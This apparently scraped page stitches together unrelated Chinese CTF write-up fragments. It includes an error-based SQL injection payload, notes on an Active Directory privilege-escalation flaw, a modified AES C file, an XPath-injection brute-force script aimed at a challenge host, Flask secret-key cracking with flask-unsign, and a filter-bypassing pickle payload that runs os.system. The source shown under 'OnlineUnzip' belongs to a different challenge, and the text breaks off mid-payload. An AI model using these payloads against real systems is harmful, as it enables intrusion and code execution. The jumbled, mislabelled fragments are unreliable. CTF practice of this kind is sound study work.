Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
这里记一下踩坑,account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--(' 这是完整的payload,最开始我的payload为account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+。
Enables the addition of custom headers within requests Offers customization of various HTTP methods for both origin and target requests Supports rate-limiting to manage request thresholds effectively Provides the option to specify 'ignored parameters' which the tool will ignore during execution Improved the support in nested arrays/objects inside JSON data in responses
下一个是什么
Support additional content types, such as '应用程序/x-www-form-urlenCoded'
该提权漏洞适用于所有的Windows服务器活动目录版本,包含目前位于微软产品支持范围内的Windows Server 2012 R2到Windows Server 2022,以及超出产品支持范围的旧Windows服务器版本。
入侵者至少控制一个活动目录用户账户,该用户账户对于活动目录中至少一个计算机账户具有“Validated write to DNS host name”权限。默认情况下,单个活动目录普通域用户可以加入或创建(包含创建空账户)10个计算机账户到活动目录中,并对自己所加入/创建的计算机账户具有CREATOR OWNER管理权限(包含“Validated write to DNShost name”权限)。因此该权限较为容易获得。
最后那句可以在invisible-watermark/dwtDctSvd.py at main · ShieldMnt/invisible-watermark (github.com)这找到相关源码,解量化的方法就是 int ((s[0] % scale) > scale * 0.5),思路就结束了,所以说图片先分块,然后用dct变换后再svd分解,取矩阵的最大特征值后解量化即可,据此写脚本得到
aes.c: #include <ctype.h>#include <stdint.h>#include <stdio.h>#include <stdlib.h>#include <string.h> void hexdump(void *pdata, int size) { const uint8_t *p = (const uint8_t *)pdata; int count = size / 16; int rem = size % 16; for (int r = 0; r <= count; r++) { int k = (r == count) ? rem : 16; if (r) printf("\n"); for (int i = 0; i < 16; i++) { if (i < k) printf("%02X ", p[i]); else printf(" "); } printf(" "); for (int i = 0; i < k; i++) { printf("%c", isprint(p[i]) ? p[i] : '.'); } p += 0x10; } printf("\n");} /* This is an implementation of the AES algorithm, specifically ECB, CTR and CBCmode. Block size can be chosen in aes.h - available choices are AES128, AES192,AES256. The implementation is verified against the test vectors in: National Institute of Standards and Technology Special Publication 800-38A2001 ED ECB-AES128---------- plain-text: 6bc1bee22e409f96e93d7e117393172a ae2d8a571e03ac9c9eb76fac45af8e51 30c81c46a35ce411e5fbc1191a0a52ef f69f2445df4f9b17ad2b417be66c3710 key: 2b7e151628aed2a6abf7158809cf4f3c resulting cipher 3ad77bb40d7a3660a89ecaf32466ef97 f5d3d58503b9699de785895a96fdbaaf 43b1cd7f598ece23881b00e3ed030688 7b0c785e27e8ad3f8223207104725dd4
NOTE: String length must be evenly divisible by 16byte (str_len % 16 == 0) You should pad the end of the string with zeros if this is not the case. For AES192/256 the key size is proportionally larger. */ /*****************************************************************************//* Includes: *//*****************************************************************************/#include "aes.h"#include <string.h> // CBC mode, for memset /*****************************************************************************//* Defines: *//*****************************************************************************/// The number of columns comprising a state in AES. This is a constant in AES.// Value=4#define Nb 4 #if defined(AES256) && (AES256 == 1)#define Nk 8#define Nr 14#elif defined(AES192) && (AES192 == 1)#define Nk 6#define Nr 12#else#define Nk 4 // The number of 32 bit words in a key.#define Nr 10 // The number of rounds in AES Cipher.#endif // jcallan@github points out that declaring Multiply as a function// reduces code size considerably with the Keil ARM compiler.// See this link for more information:// https://github.com/kokke/tiny-AES-C/pull/3#ifndef MULTIPLY_AS_A_FUNCTION#define MULTIPLY_AS_A_FUNCTION 0#endif /*****************************************************************************//* Private variables: *//*****************************************************************************/// state - array holding the intermediate results during decryption.typedef uint8_t state_t[4][4]; // The lookup-tables are marked const so they can be placed in read-only storage// instead of RAM The numbers below can be computed dynamically trading ROM for// RAM - This can be useful in (embedded) bootloader applications, where ROM is// often limited.static const uint8_t sbox[256] = { // 0 1 2 3 4 5 6 7 8 9 A B C // D E F 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16}; #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1)static const uint8_t rsbox[256] = { 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d};#endif // The round constant word array, Rcon[i], contains the values given by// x to the power (i-1) being powers of x (x is denoted as {02}) in the field// GF(2^8)static const uint8_t Rcon[11] = {0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36}; /* * Jordan Goulder points out in PR #12 * (https://github.com/kokke/tiny-AES-C/pull/12), that you can remove most of * the elements in the Rcon array, because they are unused. * * From Wikipedia's article on the Rijndael key schedule @ * https://en.wikipedia.org/wiki/Rijndael_key_schedule#Rcon * * "Only the first some of these constants are actually used – up to rcon[10] * for AES-128 (as 11 round keys are needed), up to rcon[8] for AES-192, up to * rcon[7] for AES-256. rcon[0] is not used in AES algorithm." */ /*****************************************************************************//* Private functions: *//*****************************************************************************//*static uint8_t getSBoxValue(uint8_t num){ return sbox[num];}*/#define getSBoxValue(num) (sbox[(num)]) // This function produces Nb(Nr+1) round keys. The round keys are used in each// round to decrypt the states.static void KeyExpansion(uint8_t *RoundKey, const uint8_t *Key) { unsigned i, j, k; uint8_t tempa[4]; // Used for the column/row operations // The first round key is the key itself. for (i = 0; i < Nk; ++i) { RoundKey[(i * 4) + 0] = Key[(i * 4) + 0]; RoundKey[(i * 4) + 1] = Key[(i * 4) + 1]; RoundKey[(i * 4) + 2] = Key[(i * 4) + 2]; RoundKey[(i * 4) + 3] = Key[(i * 4) + 3]; } // All other round keys are found from the previous round keys. for (i = Nk; i < Nb * (Nr + 1); ++i) { { k = (i - 1) * 4; tempa[0] = RoundKey[k + 0]; tempa[1] = RoundKey[k + 1]; tempa[2] = RoundKey[k + 2]; tempa[3] = RoundKey[k + 3]; } if (i % Nk == 0) { // This function shifts the 4 bytes in a word to the left once. // [a0,a1,a2,a3] becomes [a1,a2,a3,a0] // Function RotWord() { const uint8_t u8tmp = tempa[0]; tempa[0] = tempa[1]; tempa[1] = tempa[2]; tempa[2] = tempa[3]; tempa[3] = u8tmp; } // SubWord() is a function that takes a four-byte input word and // applies the S-box to each of the four bytes to produce an output word. // Function Subword() { tempa[0] = getSBoxValue(tempa[0]); tempa[1] = getSBoxValue(tempa[1]); tempa[2] = getSBoxValue(tempa[2]); tempa[3] = getSBoxValue(tempa[3]); } tempa[0] = tempa[0] ^ Rcon[i / Nk]; }#if defined(AES256) && (AES256 == 1) if (i % Nk == 4) { // Function Subword() { tempa[0] = getSBoxValue(tempa[0]); tempa[1] = getSBoxValue(tempa[1]); tempa[2] = getSBoxValue(tempa[2]); tempa[3] = getSBoxValue(tempa[3]); } }#endif j = i * 4; k = (i - Nk) * 4; RoundKey[j + 0] = RoundKey[k + 0] ^ tempa[0]; RoundKey[j + 1] = RoundKey[k + 1] ^ tempa[1]; RoundKey[j + 2] = RoundKey[k + 2] ^ tempa[2]; RoundKey[j + 3] = RoundKey[k + 3] ^ tempa[3]; }} void AES_init_ctx(struct AES_ctx *ctx, const uint8_t *key) { KeyExpansion(ctx->RoundKey, key);}#if (defined(CBC) && (CBC == 1)) || (defined(CTR) && (CTR == 1))void AES_init_ctx_iv(struct AES_ctx *ctx, const uint8_t *key, const uint8_t *iv) { KeyExpansion(ctx->RoundKey, key); memcpy(ctx->Iv, iv, AES_BLOCKLEN);}void AES_ctx_set_iv(struct AES_ctx *ctx, const uint8_t *iv) { memcpy(ctx->Iv, iv, AES_BLOCKLEN);}#endif // This function adds the round key to state.// The round key is added to the state by an XOR function.static void AddRoundKey(uint8_t round, state_t *state, const uint8_t *RoundKey) { uint8_t i, j; for (i = 0; i < 4; ++i) { for (j = 0; j < 4; ++j) { (*state)[i][j] ^= RoundKey[(round * Nb * 4) + (i * Nb) + j]; } }} // The SubBytes Function Substitutes the values in the// state matrix with values in an S-box.static void SubBytes(state_t *state) { uint8_t i, j; for (i = 0; i < 4; ++i) { for (j = 0; j < 4; ++j) { (*state)[j][i] = getSBoxValue((*state)[j][i]); } }} // The ShiftRows() function shifts the rows in the state to the left.// Each row is shifted with different offset.// Offset = Row number. So the first row is not shifted.static void ShiftRows(state_t *state) { uint8_t temp; // Rotate first row 1 columns to left temp = (*state)[0][1]; (*state)[0][1] = (*state)[1][1]; (*state)[1][1] = (*state)[2][1]; (*state)[2][1] = (*state)[3][1]; (*state)[3][1] = temp; // Rotate second row 2 columns to left temp = (*state)[0][2]; (*state)[0][2] = (*state)[2][2]; (*state)[2][2] = temp; temp = (*state)[1][2]; (*state)[1][2] = (*state)[3][2]; (*state)[3][2] = temp; // Rotate third row 3 columns to left temp = (*state)[0][3]; (*state)[0][3] = (*state)[3][3]; (*state)[3][3] = (*state)[2][3]; (*state)[2][3] = (*state)[1][3]; (*state)[1][3] = temp;} static uint8_t xtime(uint8_t x) { return ((x << 1) ^ (((x >> 7) & 1) * 0x1b)); } // MixColumns function mixes the columns of the state matrixstatic void MixColumns(state_t *state) { uint8_t i; uint8_t Tmp, Tm, t; for (i = 0; i < 4; ++i) { t = (*state)[i][0]; Tmp = (*state)[i][0] ^ (*state)[i][1] ^ (*state)[i][2] ^ (*state)[i][3]; Tm = (*state)[i][0] ^ (*state)[i][1]; Tm = xtime(Tm); (*state)[i][0] ^= Tm ^ Tmp; Tm = (*state)[i][1] ^ (*state)[i][2]; Tm = xtime(Tm); (*state)[i][1] ^= Tm ^ Tmp; Tm = (*state)[i][2] ^ (*state)[i][3]; Tm = xtime(Tm); (*state)[i][2] ^= Tm ^ Tmp; Tm = (*state)[i][3] ^ t; Tm = xtime(Tm); (*state)[i][3] ^= Tm ^ Tmp; }} // Multiply is used to multiply numbers in the field GF(2^8)// Note: The last call to xtime() is unneeded, but often ends up generating a// smaller binary// The compiler seems to be able to vectorize the operation better this// way. See https://github.com/kokke/tiny-AES-c/pull/34#if MULTIPLY_AS_A_FUNCTIONstatic uint8_t Multiply(uint8_t x, uint8_t y) { return (((y & 1) * x) ^ ((y >> 1 & 1) * xtime(x)) ^ ((y >> 2 & 1) * xtime(xtime(x))) ^ ((y >> 3 & 1) * xtime(xtime(xtime(x)))) ^ ((y >> 4 & 1) * xtime(xtime(xtime( xtime(x)))))); /* this last call to xtime() can be omitted */}#else#define Multiply(x, y) \ (((y & 1) * x) ^ ((y >> 1 & 1) * xtime(x)) ^ \ ((y >> 2 & 1) * xtime(xtime(x))) ^ \ ((y >> 3 & 1) * xtime(xtime(xtime(x)))) ^ \ ((y >> 4 & 1) * xtime(xtime(xtime(xtime(x)))))) #endif #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1)/*static uint8_t getSBoxInvert(uint8_t num){ return rsbox[num];}*/#define getSBoxInvert(num) (rsbox[(num)]) // MixColumns function mixes the columns of the state matrix.// The method used to multiply may be difficult to understand for the// inexperienced. Please use the references to gain more information.static void InvMixColumns(state_t *state) { int i; uint8_t a, b, c, d; for (i = 0; i < 4; ++i) { a = (*state)[i][0]; b = (*state)[i][1]; c = (*state)[i][2]; d = (*state)[i][3]; (*state)[i][0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09); (*state)[i][1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d); (*state)[i][2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b); (*state)[i][3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e); }} // The SubBytes Function Substitutes the values in the// state matrix with values in an S-box.static void InvSubBytes(state_t *state) { uint8_t i, j; for (i = 0; i < 4; ++i) { for (j = 0; j < 4; ++j) { (*state)[j][i] = getSBoxInvert((*state)[j][i]); } }} static void InvShiftRows(state_t *state) { uint8_t temp; // Rotate first row 1 columns to right temp = (*state)[3][1]; (*state)[3][1] = (*state)[2][1]; (*state)[2][1] = (*state)[1][1]; (*state)[1][1] = (*state)[0][1]; (*state)[0][1] = temp; // Rotate second row 2 columns to right temp = (*state)[0][2]; (*state)[0][2] = (*state)[2][2]; (*state)[2][2] = temp; temp = (*state)[1][2]; (*state)[1][2] = (*state)[3][2]; (*state)[3][2] = temp; // Rotate third row 3 columns to right temp = (*state)[0][3]; (*state)[0][3] = (*state)[1][3]; (*state)[1][3] = (*state)[2][3]; (*state)[2][3] = (*state)[3][3]; (*state)[3][3] = temp;}#endif // #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1) void swap_xxx(state_t *state) { for (int j = 0; j < 4; j++) { uint8_t a = (*state)[j][0]; uint8_t b = (*state)[j][1]; uint8_t c = (*state)[j][2]; uint8_t d = (*state)[j][3]; (*state)[j][3] = a; (*state)[j][2] = b; (*state)[j][1] = c; (*state)[j][0] = d; }} // Cipher is the main function that encrypts the PlainText.static void Cipher(state_t *state, const uint8_t *RoundKey) { uint8_t round = 0; // Add the First round key to the state before starting the rounds. AddRoundKey(0, state, RoundKey); // There will be Nr rounds. // The first Nr-1 rounds are identical. // These Nr rounds are executed in the loop below. // Last one without MixColumns() for (round = 1;; ++round) { if (round != Nr) { swap_xxx(state); } if (round == Nr) { uint32_t a = *(uint32_t *)(*state)[3]; uint32_t b = *(uint32_t *)(*state)[2]; uint32_t c = *(uint32_t *)(*state)[1]; uint32_t d = *(uint32_t *)(*state)[0]; *(uint32_t *)(*state)[0] = a; *(uint32_t *)(*state)[1] = b; *(uint32_t *)(*state)[2] = c; *(uint32_t *)(*state)[3] = d; } SubBytes(state); ShiftRows(state); if (round == Nr) { uint32_t a = *(uint32_t *)(*state)[0]; uint32_t b = *(uint32_t *)(*state)[1]; uint32_t c = *(uint32_t *)(*state)[2]; uint32_t d = *(uint32_t *)(*state)[3]; *(uint32_t *)(*state)[0] = a; *(uint32_t *)(*state)[3] = b; *(uint32_t *)(*state)[2] = c; *(uint32_t *)(*state)[1] = d; break; } MixColumns(state); swap_xxx(state); AddRoundKey(round, state, RoundKey); hexdump((*state), sizeof(*state)); } hexdump(*state, sizeof(*state)); // Add round key to last round AddRoundKey(Nr, state, RoundKey); swap_xxx(state);} #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1)static void InvCipher(state_t *state, const uint8_t *RoundKey) { uint8_t round = 0; swap_xxx(state); // Add the First round key to the state before starting the rounds. AddRoundKey(Nr, state, RoundKey); // There will be Nr rounds. // The first Nr-1 rounds are identical. // These Nr rounds are executed in the loop below. // Last one without InvMixColumn() for (round = (Nr - 1);; --round) { if (round == (Nr - 1)) { uint32_t a = *(uint32_t *)(*state)[0]; uint32_t b = *(uint32_t *)(*state)[1]; uint32_t c = *(uint32_t *)(*state)[2]; uint32_t d = *(uint32_t *)(*state)[3]; *(uint32_t *)(*state)[0] = a; *(uint32_t *)(*state)[3] = b; *(uint32_t *)(*state)[2] = c; *(uint32_t *)(*state)[1] = d; } InvShiftRows(state); InvSubBytes(state); if (round == (Nr - 1)) { uint32_t a = *(uint32_t *)(*state)[3]; uint32_t b = *(uint32_t *)(*state)[2]; uint32_t c = *(uint32_t *)(*state)[1]; uint32_t d = *(uint32_t *)(*state)[0]; *(uint32_t *)(*state)[0] = a; *(uint32_t *)(*state)[1] = b; *(uint32_t *)(*state)[2] = c; *(uint32_t *)(*state)[3] = d; } if (round != (Nr - 1)) { swap_xxx(state); } AddRoundKey(round, state, RoundKey); if (round == 0) { break; } swap_xxx(state); InvMixColumns(state); }}#endif // #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1) /*****************************************************************************//* Public functions: *//*****************************************************************************/#if defined(ECB) && (ECB == 1) void AES_ECB_encrypt(const struct AES_ctx *ctx, uint8_t *buf) { // The next function call encrypts the PlainText with the Key using AES // algorithm. Cipher((state_t *)buf, ctx->RoundKey);} void AES_ECB_decrypt(const struct AES_ctx *ctx, uint8_t *buf) { // The next function call decrypts the PlainText with the Key using AES // algorithm. InvCipher((state_t *)buf, ctx->RoundKey);} #endif // #if defined(ECB) && (ECB == 1) #if defined(CBC) && (CBC == 1) static void XorWithIv(uint8_t *buf, const uint8_t *Iv) { uint8_t i; for (i = 0; i < AES_BLOCKLEN; ++i) // The block in AES is always 128bit no matter the key size { buf[i] ^= Iv[i]; }} void AES_CBC_encrypt_buffer(struct AES_ctx *ctx, uint8_t *buf, size_t length) { size_t i; uint8_t *Iv = ctx->Iv; for (i = 0; i < length; i += AES_BLOCKLEN) { XorWithIv(buf, Iv); Cipher((state_t *)buf, ctx->RoundKey); Iv = buf; buf += AES_BLOCKLEN; } /* store Iv in ctx for next call */ memcpy(ctx->Iv, Iv, AES_BLOCKLEN);} void AES_CBC_decrypt_buffer(struct AES_ctx *ctx, uint8_t *buf, size_t length) { size_t i; uint8_t storeNextIv[AES_BLOCKLEN]; for (i = 0; i < length; i += AES_BLOCKLEN) { memcpy(storeNextIv, buf, AES_BLOCKLEN); InvCipher((state_t *)buf, ctx->RoundKey); XorWithIv(buf, ctx->Iv); memcpy(ctx->Iv, storeNextIv, AES_BLOCKLEN); buf += AES_BLOCKLEN; }} #endif // #if defined(CBC) && (CBC == 1) #if defined(CTR) && (CTR == 1) /* Symmetrical operation: same function for encrypting as for decrypting. Note * any IV/nonce should never be reused with the same key */void AES_CTR_xcrypt_buffer(struct AES_ctx *ctx, uint8_t *buf, size_t length) { uint8_t buffer[AES_BLOCKLEN]; size_t i; int bi; for (i = 0, bi = AES_BLOCKLEN; i < length; ++i, ++bi) { if (bi == AES_BLOCKLEN) /* we need to regen xor compliment in buffer */ { memcpy(buffer, ctx->Iv, AES_BLOCKLEN); Cipher((state_t *)buffer, ctx->RoundKey); /* Increment Iv and handle overflow */ for (bi = (AES_BLOCKLEN - 1); bi >= 0; --bi) { /* inc will overflow */ if (ctx->Iv[bi] == 255) { ctx->Iv[bi] = 0; continue; } ctx->Iv[bi] += 1; break; } bi = 0; } buf[i] = (buf[i] ^ buffer[bi]); }} #endif // #if defined(CTR) && (CTR == 1) unsigned char hexData2[176] = { 0x39, 0xBA, 0x3A, 0x0B, 0x1C, 0x27, 0x64, 0xA2, 0x80, 0x98, 0x31, 0x36, 0xEB, 0x9E, 0x77, 0x9E, 0x32, 0x53, 0x31, 0xFF, 0x2E, 0x74, 0x55, 0x5D, 0xAE, 0xEC, 0x64, 0x6B, 0x45, 0x72, 0x13, 0xF5, 0xD4, 0x3D, 0x71, 0x80, 0xFA, 0x49, 0x24, 0xDD, 0x54, 0xA5, 0x40, 0xB6, 0x11, 0xD7, 0x53, 0x43, 0xCE, 0xBF, 0x7F, 0x69, 0x34, 0xF6, 0x5B, 0xB4, 0x60, 0x53, 0x1B, 0x02, 0x71, 0x84, 0x48, 0x41, 0x4D, 0x1C, 0x20, 0x33, 0x79, 0xEA, 0x7B, 0x87, 0x19, 0xB9, 0x60, 0x85, 0x68, 0x3D, 0x28, 0xC4, 0x51, 0x59, 0x07, 0x17, 0x28, 0xB3, 0x7C, 0x90, 0x31, 0x0A, 0x1C, 0x15, 0x59, 0x37, 0x34, 0xD1, 0x6F, 0x92, 0x9D, 0x2F, 0x47, 0x21, 0xE1, 0xBF, 0x76, 0x2B, 0xFD, 0xAA, 0x2F, 0x1C, 0xC9, 0x7B, 0x4E, 0x87, 0x01, 0xB2, 0x09, 0xA6, 0xE0, 0x0D, 0x7F, 0x8D, 0x1D, 0xA7, 0x50, 0x91, 0xD4, 0xDC, 0xC8, 0xD4, 0x80, 0x7A, 0xC1, 0x72, 0x60, 0x77, 0xBE, 0xFF, 0x7D, 0xD0, 0xEE, 0x6E, 0xA9, 0x0C, 0x36, 0xFC, 0x1F, 0xB2, 0xF7, 0x8E, 0x7F, 0xC5, 0x49, 0x71, 0x02, 0x15, 0xA7, 0x1F, 0xAB, 0x19, 0xE2, 0xA0, 0xDF, 0xE6, 0x15, 0x2E, 0xA0, 0x23, 0x5C, 0x5F, 0xA2, 0x36, 0xFB, 0x40, 0x09, 0x2F}; int main() { struct AES_ctx ctx; uint8_t key[] = "\x39\xba\x3a\x0b\x1c\x27\x64\xa2\x80\x98\x31\x36\xeb\x9e\x77\x9e"; uint8_t buf[16] = "FFFFFFFFFFFFFFFF"; AES_init_ctx(&ctx, key); memcpy(ctx.RoundKey, hexData2, sizeof(hexData2)); hexdump(ctx.RoundKey, sizeof(ctx.RoundKey)); AES_ECB_encrypt(&ctx, buf); hexdump(buf, sizeof(buf)); uint8_t bufx[16] = "\xAA\xFE\xE4\xE0\xC3\xB3\x24\x16\x4E\x5B\xF7\x13\x9E\xE1\xCA\xA0"; AES_ECB_decrypt(&ctx, bufx); hexdump(bufx, sizeof(bufx)); return 0;}
四、web
1.题目名称:babyjava
xpath 注入,参考:https://xz.aliyun.com/t/7791#toc-6 exp:import requestsurl = 'http://eci-2zeck6h5lu4hlf0o62vg.cloudeci1.ichunqiu.com:8888/hello'head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}strs = '}_{-abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'flag = ''for i in range(1, 100):for j in strs:payload_1 = { # root"xpath":"admin' or substring(name(/*[1]), {}, 1)='{}".format(i,j)}payload_2 = { # user"xpath":"admin'or substring(name(/root/*[1]), {}, 1)='{}".format(i,j)}payload_3 = { # username"xpath":"admin'or substring(name(/root/user/*[2]), {}, 1)='{}".format(i,j)}payload_4 = { # username"xpath":"admin'or substring(name(/root/user/*[1]), {}, 1)='{}".format(i,j)}payload_7 = { # flag"xpath":"1' or substring(/root/user/username[2]/text(),{},1)='{}".format(i,j)}r = requests.post(url=url, headers=head, data=payload_7)if "This information is not available" not in r.text:flag += jprint(flag)breakif "This information is not available" in r.text:breakprint(flag)
2.题目名称:OnlineUnzip
题目源代码如下:import os import re from hashlib import md5 from flask import Flask, redirect, request, render_template, url_for, make_response
app=Flask(__name__)
def extractFile(filepath): extractdir=filepath.split('.')[0] if not os.path.exists(extractdir): os.makedirs(extractdir) os.system(f'unzip -o {filepath} -d {extractdir}') return redirect(url_for('display',extractdir=extractdir))
@app.route('/') def hello_world(): if not session.get('user'): session['user'] = ''.join(random.choices("admin", k=5)) return 'Hello {}!'.format(session['user'])
@app.route('/admin') def admin(): if session.get('user') != "admin": return f"<script>alert('Access Denied');window.location.href='/'</script>" else: try: a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes") if b'R' in a or b'i' in a or b'o' in a or b'b' in a: raise pickle.UnpicklingError("R i o b is forbidden") pickle.loads(base64.b64decode(session.get('ser_data'))) return "ok" except: return "error!"
if __name__ == '__main__': app.run(host='0.0.0.0', port=8888)首先我们如果要反序列化的化,就要伪造session让自己是admin。那么我们首先就需要获取到密钥。这里的密钥是伪随机的。我们生成字典利用工具爆破出密钥即可numbers_str = [str(x) for x in range(10)] a=['a','b','c','d','e','f'] a+= numbers_str file=open("C:/Users/Administrator/Desktop/easypickle/zidian.txt",'w') for b in a: for c in a: for d in a: for e in a: file.write("{}{}{}{}\n".format(b,c,d,e)) 然后利用flask-unsign工具直接跑就行了(跑得不是一般的快flask-unsign --unsign --cookie "eyJ1c2VyIjoiYWRtaW4ifQ.YyVFUA.RSTsbveITHMSD9v0MTLMswCryRc" --wordlist "C:\Users\Administrator\Desktop\easypickle\zidian.txt" --no-literal-eval [*] Session decodes to: {'user': 'admin'} [*] Starting brute-forcer with 8 threads.. [+] Found secret key after 24960 attempts b'6174 黑名单这里的逻辑是把我们的序列化的数据解码后正则,再替换,只要替换后的payload过了waf就可以了。最后反序列化的是替换前的。那么这里其实是可以用o指令,只是也要把s指令带上,那么替换之后就变成了Os然后是可以过waf的,最后反序列化的是os.s的指令如下。那么我们只需要把s指令和o指令合理结合即可 本地测试一下import pickle import base64 import os code=b'''(S'shanghe'\nS'shanghe'\nd(S'shanghe'\nS'shanghe'\nd(cos\nsystem\nS'dir'\nos.'''
